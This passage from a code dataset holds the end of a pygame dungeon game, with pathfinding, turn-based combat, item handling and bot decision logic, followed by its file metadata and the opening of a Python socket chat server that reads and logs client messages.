isinstance(object_in_game, Portal):\r\n return object_in_game\r\n else:\r\n pass\r\n else:\r\n return None\r\n\r\n\r\ndef find_portal_by_range(object_in_game):\r\n list_of_all_items = []\r\n for port in portals:\r\n path_1 = bfs(game_map_clean, object_in_game.get_position(), port.get_position())\r\n list_of_all_items.append([port, len(path_1) - 1])\r\n\r\n sorted_list = sorted(list_of_all_items, key=lambda x_val: x_val[1])\r\n\r\n newly_sorted_list = []\r\n for lists in sorted_list:\r\n newly_sorted_list.append(lists[0])\r\n\r\n return newly_sorted_list\r\n\r\n\r\ndef teleport(person):\r\n person.set_position([1, 1])\r\n global map_level, game_map_clean, game_map, map_dimensions, items, portals, enemies1, enemies2, objects, characters,\\\r\n enemies\r\n map_level = 2\r\n\r\n items, portals, enemies1, enemies2 = load_new_map('map', map_level)\r\n objects = [player2]\r\n characters = [player2]\r\n\r\n enemies = []\r\n for t in items:\r\n objects.append(t)\r\n for t in portals:\r\n objects.append(t)\r\n for t in enemies1:\r\n objects.append(t)\r\n characters.append(t)\r\n enemies.append(t)\r\n for t in enemies2:\r\n objects.append(t)\r\n characters.append(t)\r\n enemies.append(t)\r\n\r\n game_map_clean = load_map('map', map_level)\r\n game_map 
= load_map('map', map_level)\r\n    map_dimensions = get_map_dimensions('map', map_level)\r\n\r\n\r\ndef if_action_teleport(object_in_game):\r\n    if find_portal_in_area(object_in_game) is not None:\r\n        teleport(object_in_game)\r\n        global has_teleported\r\n        has_teleported = True\r\n    else:\r\n        print(\"Not able to teleport\")\r\n\r\n\r\ndef get_list_of_movement(player_pos, path_coords):\r\n    # Converts a BFS path of absolute coordinates into a list of relative steps\r\n    list_of_movement = []\r\n    for coord in path_coords[1:]:\r\n        diff = [coord[0] - player_pos[0], coord[1] - player_pos[1]]\r\n        player_pos = [coord[0], coord[1]]  # advance the reference point to the cell just processed\r\n        list_of_movement.append(diff)\r\n\r\n    return list_of_movement\r\n\r\n\r\n# END CODE FOR PLAYER TO CALL\r\ndef if_action_move(game_map_temp, object_in_game):\r\n    current_position = object_in_game.get_position()\r\n    value_of_action = object_in_game.get_action()[1]\r\n    object_rect = object_in_game.get_rect()\r\n    if current_position != value_of_action:\r\n        list_of_positions = bfs(game_map_temp, current_position, value_of_action)\r\n        if list_of_positions != -1:\r\n            list_of_moving = get_list_of_movement(current_position, list_of_positions)\r\n            if len(list_of_moving) != 0:\r\n                new_coords = [current_position[0] + list_of_moving[0][0], current_position[1] + list_of_moving[0][1]]\r\n                if check_open_square(new_coords):\r\n                    object_new_pos = list_of_moving[0]\r\n                    object_in_game.set_position(new_coords)\r\n                    object_rect, collisions = move(object_rect, object_new_pos, tile_rectangles)\r\n\r\n                    object_in_game.set_rect(object_rect)\r\n                    list_of_moving.remove(list_of_moving[0])\r\n                else:\r\n                    object_in_game.set_action(\"STAY\", object_in_game.get_position())\r\n\r\n            else:\r\n                object_in_game.set_action(\"STAY\", object_in_game.get_position())\r\n\r\n        else:\r\n            print(\"Bot didn't Move. Invalid location\")\r\n\r\n    else:\r\n        object_in_game.set_action(\"STAY\", object_in_game.get_position())\r\n\r\n\r\ndef attack(attacker, attacked):\r\n    damage = 0\r\n    hit_percentage = attacker.get_weapon_hit_chance() + attacker.get_accuracy_bonus() - attacked.get_agility_bonus()\r\n    # print(\"Hit Percentage:\" + str(hit_percentage))\r\n    # print(\"Item Damage:\" + str(attacker.get_item_damage()))\r\n    # print(\"Attack Bonus:\" + str(attacker.get_attack_bonus()))\r\n    # If the attack hits set the damage, otherwise it stays at 0\r\n    if random.randint(1, 100) <= hit_percentage:\r\n        damage = max(0, attacker.get_damage() + attacker.get_attack_bonus() - attacked.get_defense())\r\n        # print(attacked.get_defense())\r\n        # Checks for critical strike\r\n        if random.randint(1, 10) <= (attacker.get_accuracy() - attacked.get_agility()):\r\n            damage = damage * 1.5\r\n            print(attacker.get_name() + \" critically struck \" + attacked.get_name() + \" for \" + str(damage) + \" damage\")\r\n        else:\r\n            print(attacker.get_name() + \" hit \" + attacked.get_name() + \" for \" + str(damage) + \" damage.\")\r\n    else:\r\n        print(attacked.get_name() + \" dodged the attack from \" + attacker.get_name() + \".\")\r\n    attacked.add_current_health(-damage)\r\n    print(attacked.get_name() + \" has \" + str(attacked.get_current_health()) + \" health left.\")\r\n\r\n\r\ndef if_action_attack(object_in_game):\r\n    action, attacked = object_in_game.get_action()\r\n    attack(object_in_game, attacked)\r\n\r\n    if attacked.is_dead:\r\n        if isinstance(attacked, Player):\r\n            object_in_game.add_xp(attacked.get_death_xp())\r\n\r\n            try:\r\n                print(attacked.get_name() + \" IS DEAD+++++++++++++++\")\r\n                # Drop Equipped Item\r\n                try:\r\n                    random_drop_roll = random.randint(1, 10)\r\n                    if random_drop_roll < drop_proc:\r\n                        if 
attacked.get_equipped_weapon() is not None:\r\n                            item_from_drop = copy(attacked.get_equipped_weapon())\r\n                            attacked.drop_item(item_from_drop)\r\n                            item_from_drop.set_position(attacked.get_position())\r\n                            item_from_drop.set_on_ground(True)\r\n\r\n                            items.append(item_from_drop)\r\n                            objects.append(item_from_drop)\r\n                            [x_drop, y_drop] = attacked.get_position()\r\n                            game_map[y_drop][x_drop] = \"4\"\r\n                        else:\r\n                            pass\r\n                except Exception:\r\n                    # Only report a problem when the drop logic actually failed\r\n                    print(\"Attack did not go well... Check code\")\r\n\r\n                players.remove(attacked)\r\n                characters.remove(attacked)\r\n                objects.remove(attacked)\r\n            finally:\r\n                pass\r\n\r\n\r\n        if isinstance(attacked, Enemy):\r\n            print(\"Player's xp before kill: \" + str(object_in_game.get_xp()) + \": \" + str(object_in_game.get_rank()))\r\n            object_in_game.add_xp(attacked.get_death_xp())\r\n            print(\"Player's xp after kill: \" + str(object_in_game.get_xp()) + \": \" + str(object_in_game.get_rank()))\r\n            try:\r\n                # Drop Equipped Item\r\n                try:\r\n                    random_drop_roll = random.randint(1, 10)\r\n                    if random_drop_roll < drop_proc:\r\n                        if attacked.get_equipped_weapon() is not None:\r\n                            item_from_drop = copy(attacked.get_equipped_weapon())\r\n                            attacked.drop_item(item_from_drop)\r\n                            item_from_drop.set_position(attacked.get_position())\r\n                            item_from_drop.set_on_ground(True)\r\n\r\n                            items.append(item_from_drop)\r\n                            objects.append(item_from_drop)\r\n                            [x_drop, y_drop] = attacked.get_position()\r\n                            game_map[y_drop][x_drop] = \"4\"\r\n                        else:\r\n                            pass\r\n                finally:\r\n                    pass\r\n\r\n                print(attacked.get_name() + \" IS DEAD+++++++++++++++\")\r\n                enemies.remove(attacked)\r\n                characters.remove(attacked)\r\n                objects.remove(attacked)\r\n            finally:\r\n                pass\r\n        else:\r\n            pass\r\n    else:\r\n        pass\r\n\r\n\r\ndef pickup(person, pickup_item):\r\n    person.get_item(pickup_item)\r\n    pickup_item.set_on_ground(False)\r\n    person.print_inventory()\r\n    items.remove(pickup_item)\r\n    objects.remove(pickup_item)\r\n    person.set_has_new_weapon(True)\r\n\r\n\r\ndef if_action_pickup(object_in_game):\r\n    action, item = object_in_game.get_action()\r\n    pickup(object_in_game, item)\r\n\r\n\r\ndef drop(person, dropping_item):\r\n    person.drop_item(dropping_item)\r\n\r\n\r\ndef if_action_drop(object_in_game):\r\n    action, item = object_in_game.get_action()\r\n    drop(object_in_game, item)\r\n\r\n\r\ndef activate(person, activate_item):\r\n    person.set_active_potion(activate_item)\r\n\r\n\r\ndef if_action_activate(object_in_game):\r\n    action, item = object_in_game.get_action()\r\n    activate(object_in_game, item)\r\n\r\n\r\ndef rotate_list(given_list, num):\r\n    given_list = given_list[num:] + given_list[:num]\r\n    return given_list\r\n\r\n\r\ndef equip(person, equipping_item):\r\n    person.set_item(equipping_item)\r\n    person.set_has_new_weapon(False)\r\n\r\n\r\ndef if_action_equip(object_in_game):\r\n    action, item = object_in_game.get_action()\r\n    equip(object_in_game, item)\r\n\r\n\r\ndef get_player_decision(player):\r\n    # Compare and equip weapons/shields code:\r\n    a = player.get_equipped_weapon() is not None\r\n    if a:\r\n        b = len(player.get_weapons()) > 1\r\n        c = player.get_has_new_weapon()\r\n        item_to_equip = player.get_max_weapon_damage()\r\n        d = item_to_equip != player.get_equipped_weapon()\r\n        var = a and b and c and d\r\n    else:\r\n        var = False\r\n\r\n    # Checking immediate area: 1 block in any direction\r\n    if find_enemy_in_area(player) is not None:\r\n        enemy_to_attack = find_enemy_in_area(player)\r\n        player.set_action(\"ATTACK\", enemy_to_attack)\r\n\r\n    elif find_item_in_area(player) is not 
None:\r\n        item_to_pickup = find_item_in_area(player)\r\n        player.set_action(\"PICKUP\", item_to_pickup)\r\n\r\n    elif find_portal_in_area(player) is not None:\r\n        player.set_action(\"TELEPORT\", 0)\r\n\r\n    # Equipping first gear\r\n    elif player.get_equipped_weapon() is None and len(player.get_weapons()) != 0:\r\n        item_to_equip = player.get_weapons()[0]\r\n        player.set_action(\"EQUIP\", item_to_equip)\r\n\r\n    elif player.get_equipped_shield() is None and len(player.get_shields()) != 0:\r\n        item_to_equip = player.get_shields()[0]\r\n        player.set_action(\"EQUIP\", item_to_equip)\r\n\r\n    elif player.get_equipped_helmet() is None and len(player.get_helmets()) != 0:\r\n        item_to_equip = player.get_helmets()[0]\r\n        player.set_action(\"EQUIP\", item_to_equip)\r\n\r\n    elif player.get_equipped_necklace() is None and len(player.get_necklaces()) != 0:\r\n        item_to_equip = player.get_necklaces()[0]\r\n        player.set_action(\"EQUIP\", item_to_equip)\r\n\r\n    elif player.get_equipped_trinket() is None and len(player.get_all_trinkets()) != 0:\r\n        item_to_equip = player.get_all_trinkets()[0]\r\n        player.set_action(\"EQUIP\", item_to_equip)\r\n\r\n    # Activating Health Potion\r\n    elif player.get_active_potion() is None and len(player.get_healing_potions()) != 0 and player.get_health() < 55:\r\n        item_to_activate = player.get_healing_potions()[0]\r\n        player.set_action(\"ACTIVATE\", item_to_activate)\r\n\r\n    # Activating Speed Potion\r\n    elif player.get_active_potion() is None and len(player.get_speed_potions()) != 0:\r\n        item_to_activate = player.get_speed_potions()[0]\r\n        player.set_action(\"ACTIVATE\", item_to_activate)\r\n\r\n    # Equipping the better weapon\r\n    elif var:\r\n        item_to_equip = player.get_max_weapon_damage()\r\n        player.set_action(\"EQUIP\", item_to_equip)\r\n        player.print_inventory()\r\n\r\n    elif len(player.get_weapons()) > 3:\r\n        weapons = player.get_weapons()\r\n        player.set_action(\"DROP\", weapons[len(weapons)-1])\r\n\r\n    # This checks if enemies are closer than chests in the area\r\n    elif (str(shortest_dist_to_enemy(player)) != 'inf' and str(shortest_dist_to_item(player)) != 'inf') and \\\r\n            (shortest_dist_to_enemy(player) <= shortest_dist_to_item(player)):\r\n        target = find_enemies_by_range(player)\r\n        player.set_action(\"MOVE\", target[0].get_position())\r\n\r\n    # Checks if there are items and goes for them\r\n    elif len(find_items_by_range(player)) != 0:\r\n        target = find_items_by_range(player)\r\n        player.set_action(\"MOVE\", target[0].get_position())\r\n\r\n    # Checks if there are enemies and goes for them\r\n    elif len(find_enemies_by_range(player)) != 0:\r\n        target = find_enemies_by_range(player)\r\n        player.set_action(\"MOVE\", target[0].get_position())\r\n\r\n    elif len(find_portal_by_range(player)) != 0:\r\n        target = find_portal_by_range(player)\r\n        player.set_action(\"MOVE\", target[0].get_position())\r\n\r\n    else:\r\n        player.set_action(\"STAY\", player.get_position())\r\n\r\n    return player.get_action()\r\n\r\n\r\ndef get_enemy_decision(enemy):\r\n    if find_enemy_in_area(enemy) is not None:\r\n        enemy_to_attack = find_enemy_in_area(enemy)\r\n        enemy.set_action(\"ATTACK\", enemy_to_attack)\r\n\r\n    elif len(find_enemies_in_range(enemy, 4)) != 0:\r\n        target = find_enemies_in_range(enemy, 4)\r\n        enemy.set_action(\"MOVE\", target[0].get_position())\r\n\r\n    # elif len(find_enemies_by_range(enemy)) != 0:\r\n    #     target = find_enemies_by_range(enemy)\r\n    #     enemy.set_action(\"MOVE\", target[0].get_position())\r\n    else:\r\n        enemy.set_action(\"STAY\", enemy.get_position())\r\n\r\n    return 
enemy.get_action()\r\n\r\n\r\ngame_map_clean = load_map('map', map_level)\r\ngame_map = load_map('map', map_level)\r\nmap_dimensions = get_map_dimensions('map', map_level)\r\nhas_teleported = False\r\n\r\n# Set up\r\ncounter = 0\r\ncounter_two = 0\r\nturn_count = 0\r\nwhile True:\r\n display.fill((146, 244, 255))\r\n game_loop_normal = True\r\n\r\n # true_scroll[0] += ((player1.get_rect().x + player2.get_rect().x)/2 - true_scroll[0] - 152) / 20\r\n # true_scroll[1] += ((player1.get_rect().y + player2.get_rect().y)/2 - true_scroll[1] - 106) / 20\r\n\r\n true_scroll[0] += (player2.get_rect().x - true_scroll[0] - 152) / 20\r\n true_scroll[1] += (player2.get_rect().y - true_scroll[1] - 106) / 20\r\n scroll = true_scroll.copy()\r\n scroll[0] = int(scroll[0])\r\n scroll[1] = int(scroll[1])\r\n\r\n tile_rectangles = []\r\n y = 0\r\n for layer in game_map_clean:\r\n x = 0\r\n for tile in layer:\r\n try:\r\n if int(tile) == 0:\r\n display.blit(castle_img, (x * 16 - scroll[0], y * 16 - scroll[1]))\r\n if int(tile) == 1:\r\n display.blit(dirt_img, (x * 16 - scroll[0], y * 16 - scroll[1]))\r\n if int(tile) != 0:\r\n tile_rectangles.append(pygame.Rect(x * 16, y * 16, 16, 16))\r\n except ValueError:\r\n if str(tile) == \"*\":\r\n display.blit(portal_img, (x * 16 - scroll[0], y * 16 - scroll[1]))\r\n x += 1\r\n y += 1\r\n\r\n if counter % FPS == 0: # Main Decision Code here\r\n print(\"-----------------------NEW LOOP-----------------------------\")\r\n for character in characters:\r\n character.update_self()\r\n for character in characters: # For loop after this can double action\r\n\r\n if not game_loop_normal:\r\n break\r\n\r\n move_only = False\r\n # Testing speed\r\n if isinstance(character, Player):\r\n get_player_decision(character)\r\n\r\n if isinstance(character, Enemy):\r\n get_enemy_decision(character)\r\n\r\n # This is just printing player decision for now otherwise it gets cluttered\r\n object_position = character.get_position()\r\n type_of_action, value = character.get_action()\r\n # print(character.get_name() + \" : \" + str(type_of_action) + \" : \" + str(object_position) + \" : \" +\r\n # str(character.get_current_health()))\r\n\r\n if isinstance(character, Player):\r\n print(character.get_name() + \" : \" + str(character.get_defense()) + \" : \" + str(\r\n type_of_action) + \" : \" + str(object_position) + \" : \" + str(character.get_current_health()))\r\n # print(\"PLAYER SPEED: \" + str(character.get_speed()))\r\n\r\n turn_range = 1\r\n if character.get_action()[0] == \"MOVE\" and character.get_speed() > 1:\r\n move_only = True\r\n path_2 = bfs(game_map_clean, character.get_position(), character.get_action()[1])\r\n turn_range = len(path_2)\r\n if turn_range >= character.get_speed():\r\n turn_range = character.get_speed()\r\n else:\r\n turn_range = turn_range\r\n else:\r\n move_only = False\r\n\r\n for i in range(turn_range):\r\n if isinstance(character, Player):\r\n get_player_decision(character)\r\n\r\n if isinstance(character, Enemy):\r\n get_enemy_decision(character)\r\n\r\n object_position = character.get_position()\r\n type_of_action, value = character.get_action()\r\n\r\n if type_of_action == \"ATTACK\" and not move_only:\r\n if_action_attack(character)\r\n elif type_of_action == \"MOVE\":\r\n if_action_move(game_map, character)\r\n elif type_of_action == \"PICKUP\" and not move_only:\r\n if_action_pickup(character)\r\n elif type_of_action == \"DROP\" and not move_only:\r\n if_action_drop(character)\r\n elif type_of_action == \"EQUIP\" and not move_only:\r\n 
if_action_equip(character)\r\n elif type_of_action == \"ACTIVATE\" and not move_only:\r\n if_action_activate(character)\r\n elif type_of_action == \"TELEPORT\" and not move_only:\r\n if_action_teleport(character)\r\n if has_teleported:\r\n game_loop_normal = False\r\n has_teleported = False\r\n break\r\n else:\r\n pass\r\n else:\r\n pass\r\n\r\n if not game_loop_normal:\r\n break\r\n\r\n game_map = load_map('map', map_level)\r\n if isinstance(character, Player):\r\n if character.is_dead:\r\n players.remove(character)\r\n characters.remove(character)\r\n objects.remove(character)\r\n else:\r\n display.blit(character.get_image(),\r\n (character.get_rect().x - scroll[0], character.get_rect().y - scroll[1]))\r\n new_x, new_y = character.get_position()\r\n game_map[new_y][new_x] = \"2\"\r\n\r\n if isinstance(character, Enemy):\r\n if character.is_dead:\r\n enemies.remove(character)\r\n characters.remove(character)\r\n objects.remove(character)\r\n else:\r\n display.blit(character.get_image(),\r\n (character.get_rect().x - scroll[0], character.get_rect().y - scroll[1]))\r\n new_x, new_y = character.get_position()\r\n game_map[new_y][new_x] = \"3\"\r\n\r\n for item_box in items:\r\n if item_box.on_ground():\r\n display.blit(item_box.get_image(),\r\n (item_box.get_rect().x - scroll[0], item_box.get_rect().y - scroll[1]))\r\n new_x, new_y = item_box.get_position()\r\n game_map[new_y][new_x] = \"4\"\r\n else:\r\n items.remove(item_box)\r\n objects.remove(item_box)\r\n\r\n for all_objects in objects:\r\n display.blit(all_objects.get_image(),\r\n (all_objects.get_rect().x - scroll[0], all_objects.get_rect().y - scroll[1]))\r\n turn_count += 1\r\n counter = 0\r\n\r\n # Add item code\r\n for all_objects in objects:\r\n display.blit(all_objects.get_image(), (all_objects.get_rect().x - scroll[0],\r\n all_objects.get_rect().y - scroll[1]))\r\n\r\n graphics.animate(counter_two, scroll, players, enemies)\r\n\r\n\r\n for event in pygame.event.get(): # event loop\r\n if event.type == QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n # elif event.type == VIDEORESIZE:\r\n # screen = pygame.display.set_mode(event.dict['size'], HWSURFACE | DOUBLEBUF | RESIZABLE)\r\n # display = pygame.display.set_mode(event.dict['size'], HWSURFACE | DOUBLEBUF | RESIZABLE)\r\n # screen.blit(pygame.transform.scale(screen, event.dict['size']), (0, 0))\r\n # display.blit(pygame.transform.scale(display, event.dict['size']), (0, 0))\r\n # pygame.display.update()\r\n # counter += 1\r\n # clock.tick(FPS)\r\n\r\n\r\n\r\n if counter_two == FPS:\r\n counter_two = 0\r\n\r\n screen.blit(pygame.transform.scale(display, WINDOW_SIZE), (0, 0))\r\n pygame.display.update()\r\n counter += 1\r\n counter_two += 1\r\n clock.tick(FPS)\r\n", "sub_path": "Platformer.py", "file_name": "Platformer.py", "file_ext": "py", "file_size_in_byte": 51149, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.time.Clock", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.display.set_caption", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 25, "usage_type": "call"}, 
{"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "graphics.Graphics", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 40, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 41, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "graphics.Player.get_model", "line_number": 43, "usage_type": "call"}, {"api_name": "graphics.Player", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "graphics.Enemy1.get_model", "line_number": 45, "usage_type": "call"}, {"api_name": "graphics.Enemy1", "line_number": 45, "usage_type": "attribute"}, {"api_name": "graphics.Enemy2.get_model", "line_number": 46, "usage_type": "call"}, {"api_name": "graphics.Enemy2", "line_number": 46, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 56, "usage_type": "call"}, {"api_name": "item.Item", "line_number": 106, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 128, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 129, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 130, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 203, "usage_type": "call"}, {"api_name": "item.Item", "line_number": 285, "usage_type": "call"}, {"api_name": "portal.Portal", "line_number": 325, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 332, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 344, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 392, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 393, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 522, "usage_type": "argument"}, 
{"api_name": "enemy.Enemy", "line_number": 525, "usage_type": "argument"}, {"api_name": "enemy.Enemy", "line_number": 527, "usage_type": "argument"}, {"api_name": "player.Player", "line_number": 530, "usage_type": "argument"}, {"api_name": "collections.deque", "line_number": 543, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 624, "usage_type": "argument"}, {"api_name": "enemy.get_position", "line_number": 626, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 629, "usage_type": "argument"}, {"api_name": "player.get_position", "line_number": 631, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 645, "usage_type": "argument"}, {"api_name": "enemy.get_position", "line_number": 647, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 654, "usage_type": "argument"}, {"api_name": "player.get_position", "line_number": 656, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 675, "usage_type": "argument"}, {"api_name": "enemy.get_position", "line_number": 677, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 680, "usage_type": "argument"}, {"api_name": "player.get_position", "line_number": 682, "usage_type": "call"}, {"api_name": "item.Item", "line_number": 766, "usage_type": "argument"}, {"api_name": "portal.Portal", "line_number": 795, "usage_type": "argument"}, {"api_name": "random.randint", "line_number": 905, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 909, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 925, "usage_type": "argument"}, {"api_name": "random.randint", "line_number": 932, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 935, "usage_type": "call"}, {"api_name": "enemy.Enemy", "line_number": 956, "usage_type": "argument"}, {"api_name": "random.randint", "line_number": 963, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 966, "usage_type": "call"}, {"api_name": "player.get_equipped_weapon", "line_number": 1041, "usage_type": "call"}, {"api_name": "player.get_weapons", "line_number": 1043, "usage_type": "call"}, {"api_name": "player.get_has_new_weapon", "line_number": 1044, "usage_type": "call"}, {"api_name": "player.get_max_weapon_damage", "line_number": 1045, "usage_type": "call"}, {"api_name": "player.get_equipped_weapon", "line_number": 1046, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1055, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1059, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1062, "usage_type": "call"}, {"api_name": "player.get_equipped_weapon", "line_number": 1065, "usage_type": "call"}, {"api_name": "player.get_weapons", "line_number": 1065, "usage_type": "call"}, {"api_name": "player.get_weapons", "line_number": 1066, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1067, "usage_type": "call"}, {"api_name": "player.get_equipped_shield", "line_number": 1069, "usage_type": "call"}, {"api_name": "player.get_shields", "line_number": 1069, "usage_type": "call"}, {"api_name": "player.get_shields", "line_number": 1070, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1071, "usage_type": "call"}, {"api_name": "player.get_equipped_helmet", "line_number": 1073, "usage_type": "call"}, {"api_name": "player.get_helmets", "line_number": 1073, "usage_type": "call"}, {"api_name": "player.get_helmets", "line_number": 1074, "usage_type": "call"}, {"api_name": "player.set_action", 
"line_number": 1075, "usage_type": "call"}, {"api_name": "player.get_equipped_necklace", "line_number": 1077, "usage_type": "call"}, {"api_name": "player.get_necklaces", "line_number": 1077, "usage_type": "call"}, {"api_name": "player.get_necklaces", "line_number": 1078, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1079, "usage_type": "call"}, {"api_name": "player.get_equipped_trinket", "line_number": 1081, "usage_type": "call"}, {"api_name": "player.get_all_trinkets", "line_number": 1081, "usage_type": "call"}, {"api_name": "player.get_all_trinkets", "line_number": 1082, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1083, "usage_type": "call"}, {"api_name": "player.get_active_potion", "line_number": 1086, "usage_type": "call"}, {"api_name": "player.get_healing_potions", "line_number": 1086, "usage_type": "call"}, {"api_name": "player.get_health", "line_number": 1086, "usage_type": "call"}, {"api_name": "player.get_healing_potions", "line_number": 1087, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1088, "usage_type": "call"}, {"api_name": "player.get_active_potion", "line_number": 1091, "usage_type": "call"}, {"api_name": "player.get_speed_potions", "line_number": 1091, "usage_type": "call"}, {"api_name": "player.get_speed_potions", "line_number": 1092, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1093, "usage_type": "call"}, {"api_name": "player.get_max_weapon_damage", "line_number": 1097, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1098, "usage_type": "call"}, {"api_name": "player.print_inventory", "line_number": 1099, "usage_type": "call"}, {"api_name": "player.get_weapons", "line_number": 1101, "usage_type": "call"}, {"api_name": "player.get_weapons", "line_number": 1102, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1103, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1109, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1114, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1119, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1123, "usage_type": "call"}, {"api_name": "player.set_action", "line_number": 1126, "usage_type": "call"}, {"api_name": "player.get_position", "line_number": 1126, "usage_type": "call"}, {"api_name": "player.get_action", "line_number": 1128, "usage_type": "call"}, {"api_name": "enemy.set_action", "line_number": 1134, "usage_type": "call"}, {"api_name": "enemy.set_action", "line_number": 1138, "usage_type": "call"}, {"api_name": "enemy.set_action", "line_number": 1144, "usage_type": "call"}, {"api_name": "enemy.get_position", "line_number": 1144, "usage_type": "call"}, {"api_name": "enemy.get_action", "line_number": 1146, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 1182, "usage_type": "call"}, {"api_name": "player.Player", "line_number": 1200, "usage_type": "argument"}, {"api_name": "enemy.Enemy", "line_number": 1203, "usage_type": "argument"}, {"api_name": "player.Player", "line_number": 1212, "usage_type": "argument"}, {"api_name": "player.Player", "line_number": 1230, "usage_type": "argument"}, {"api_name": "enemy.Enemy", "line_number": 1233, "usage_type": "argument"}, {"api_name": "player.Player", "line_number": 1266, "usage_type": "argument"}, {"api_name": "enemy.Enemy", "line_number": 1277, "usage_type": "argument"}, {"api_name": "graphics.animate", "line_number": 1309, 
"usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 1312, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 1312, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 1314, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 1315, "usage_type": "call"}, {"api_name": "pygame.transform.scale", "line_number": 1330, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 1330, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 1331, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 1331, "usage_type": "attribute"}]} +{"seq_id": "416676253", "text": "import sys, json, time, logging, logs.config.server_config_log, decorators, select\nfrom config import *\nfrom socket import *\n\nlog = logging.getLogger('Server_log')\nlogger = decorators.Log(log)\n\n# Функция чтения сообщений с сокетов клиентов\ndef read_messages(from_clients,client_list):\n #log.debug('Запуск функции получения сообщений от клиентов')\n global names\n # список всех полученных сообщений\n message_list = []\n for connection in from_clients:\n try:\n client_message = json.loads(connection.recv(1024).decode(\"utf-8\"))\n log.info(f'Принято сообщение от клиента: {client_message[FROM]}')\n log.debug(f'{client_message}')\n # Если спец сообщение от Admin, то вырубаем сервер\n if ACTION in client_message and \\\n client_message[ACTION] == 'Stop server' and \\\n client_message[FROM] == 'Admin':\n log.info(f'Получена команда выключения сервера, ответ: {RESPONSE}: {SHUTDOWN}')\n return {RESPONSE: SHUTDOWN}\n message_list.append((client_message,connection))\n except:\n log.debug(f'Клиент {connection.fileno()} {connection.getpeername()} отключился до передачи сообщения по таймауту ')\n names = {key: val for key, val in names.items() if val != connection}\n client_list.remove(connection)\n return message_list\n\n# Функция записи 